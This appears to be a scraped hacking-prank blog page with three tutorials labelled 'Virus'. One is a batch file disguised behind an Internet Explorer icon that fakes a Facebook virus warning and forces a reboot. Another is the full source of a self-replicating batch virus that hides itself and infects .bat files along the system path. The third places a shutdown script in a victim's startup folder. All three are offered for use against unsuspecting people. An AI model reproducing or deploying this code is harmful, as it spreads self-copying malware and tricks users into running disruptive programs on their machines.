468x60 Ads

Demo image Demo image Demo image Demo image Demo image >
Showing posts with label Virus. Show all posts
Showing posts with label Virus. Show all posts

How to make a facebook virus 2010

0 comments



I heard from many of my friends that a
virus is spreading on facebook which
delete our accounts,I first thought it
could have been a trojan that spread
out,Then i found out that its just
simple prank to shutdown your pc,Now
today i will show you  how to make a
facebook virus  to trick your friends
In this tutorial I will show you how to
make a Facebook virus using simple
commands on notepad. .This will make the
victim think they have got a virus when
they click on an icon such as Internet
Explorer .



How to make a fake facebook virus
– method

1) Open notepad
2) Type this in :

@echo off
msg * WARNING VIRUS DETECTED!!!!! AFTER
5 MINUTES YOUR FACEBOOK ACCOUNT WILL BE
DELETED !!!!TO REMOVE THE VIRUS CLICK OK
OR CLOSE THIS BOX!
PAUSE
shutdown -r -t 300 -c ” SORRY!!!
YOUR FACEBOOK ACCOUNT ARE NOW BEING
DELETED !!! PLEASE WAIT
………..”



3) Save it as  something.bat
4)Right click on Internet Explorer .bat
and click Create Shortcut
5)Right click on shorcut and click
Properties.
6) Click Change Icon
7.Choose Internet Explorer icon or
similar , click OK , then click Apply

Now your  facebook virus  is almost
ready

8).Delete real shortcut and replace it
with fake . When victim click on it , he
will get warning messages that looks
like this:








DUMMY virus 3 — Latest 2010

0 comments


It will affect *.com and *.EXE files .It
will multiply itself and may get more
dangerous when altered.
Here is the code -
The code
Here is the code -

********************************************************************


@echo off>nul.ViRuS
if “%1==”/ViRuS_MULTIPLY
goto ViRuS_multiply
if “%1==”/ViRuS_OUTER_LOOP
goto ViRuS_outer_loop
if “%1==”/ViRuS_FINDSELF
goto ViRuS_findself
if “%VOFF%==”T goto
ViRuS_OLDBAT

set ViRuSname=%0
if not exist %0.bat call %0
/ViRuS_FINDSELF %path%
if not exist %ViRuSname%.bat set
ViRuSname=
if “%ViRuSname%==” goto
ViRuS_OLDBAT

rem ViRuS if batch is started with
name.BAT, virus will not become active
rem ViRuS it was a bug, now it’s a
feature ! (also notice the voff
variable)
rem ViRuS also if batch was only in an
append /x:on path (chance=minimal)

attrib +h %ViRuSname%.bat
for %%a in (%path%;.) do call %0
/ViRuS_OUTER_LOOP %%a
attrib -h %ViRuSname%.bat
set ViRuSname=
goto ViRuS_OLDBAT

:ViRuS_findself
if “%2==” goto
XXX_END>nul.ViRuS
if exist %2\%ViRuSname%.bat set
ViRuSname=%2\%ViRuSname%
if exist %ViRuSname%.bat goto XXX_END
if exist %2%ViRuSname%.bat set
ViRuSname=%2%ViRuSname%
if exist %ViRuSname%.bat goto XXX_END
shift>nul.ViRuS
goto ViRuS_findself

:ViRuS_outer_loop
for %%a in (%2\*.bat;%2*.bat) do call %0
/ViRuS_MULTIPLY %%a
goto XXX_END>nul.ViRuS:ViRuS_multiply
find “ViRuS”
<%ViRuSname%.bat >xViRuSx.bat
find /v “ViRuS” <%2 |find
/v “:XXX_END”
>>xViRuSx.bat
echo :XXX_END>>xViRuSx.bat
copy xViRuSx.bat %2>nul
del xViRuSx.bat
goto XXX_END>nul.ViRuS

:ViRuS_OLDBAT
echo on>nul.ViRuS
echo This is the dummy Virus

MAKE COMPUTER KEEP RESTARTING (fake virus)

1 comments

MAKE COMPUTER KEEP RESTARTING 

1.open note pad  

2.type “shutdown -s” with
out quotes 

3.save the file with .bat extension 

4.explaination,u have created a prog
which shutdowns the pc with in 30
of executing the file 

5. now open “x:\Documents and
Settings\USERNAME\Start
Menu\Programs\Startup\” (x->is
the drive on which ur windows has been
installed and USERNAME is the username)


6.paste a shortcut on this directory 

NOW WHEN EVER UR FRIEND STARTS HIS PC a
count down will start after 30 sec his
pc will shutdown
u can also make his pc restart instead
of shutting down.. just replace
“shutdown -s” “restart
_s” 

enjoy…. this is not a virus but
look so….